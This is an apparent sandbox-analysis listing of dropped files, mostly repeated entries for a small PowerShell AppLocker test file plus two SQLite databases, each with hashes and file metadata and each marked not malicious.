                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
